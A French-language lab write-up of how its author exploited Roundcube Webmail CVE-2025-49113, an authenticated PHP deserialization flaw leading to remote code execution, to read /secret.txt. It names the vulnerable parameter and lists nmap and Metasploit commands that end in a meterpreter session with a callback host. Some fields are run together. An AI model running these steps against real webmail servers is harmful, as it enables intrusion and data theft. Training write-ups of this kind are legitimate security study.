Laboratoire d'exploitation pratique pour Roundcube Webmail CVE-2025-49113 (désérialisation authentifiée d'objets PHP → RCE) pour lire /secret.txt.
"AVERTISSEMENT : Usage éducatif uniquement"
Ce dépôt documente mon exploitation pas à pas de Roundcube Webmail CVE-2025-49113 dans un laboratoire contrôlé afin d'obtenir le secret stocké dans /secret.txt.
⚠️ Avertissement
Tout le travail a été effectué sur un environnement de laboratoire / formation que je suis autorisé à tester.
N'utilisez pas ces techniques contre des systèmes que vous ne possédez pas ou que vous n'administrez pas.
Roundcube Webmail est un client de messagerie PHP open source basé sur le navigateur qui se connecte aux boîtes aux lettres via IMAP et envoie des courriels via SMTP. Il fonctionne généralement sur Apache ou Nginx avec MySQL/PostgreSQL/SQLite et est largement utilisé dans les environnements d'hébergement mutualisé.
Vulnérabilité – CVE-2025-49113
Toutes les versions de Roundcube jusqu'à 1.6.10 incluse (et 1.5.x avant 1.5.10) contiennent un bug critique dans program/actions/settings/upload.php. Le paramètre _from n'est pas correctement validé, ce qui permet à un attaquant authentifié de déclencher une désérialisation non sécurisée d'objets PHP et d'obtenir une exécution de code à distance avec les privilèges du serveur web.
Identifiants du laboratoire :
roundcubercpassObjectif :
Quel est le secret contenu dans le fichier
/secret.txt?
nmapmsfconsole (Metasploit 6)172.20.2.57exploit/multi/http/roundcube_auth_rce_cve_2025_49113Commande : nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt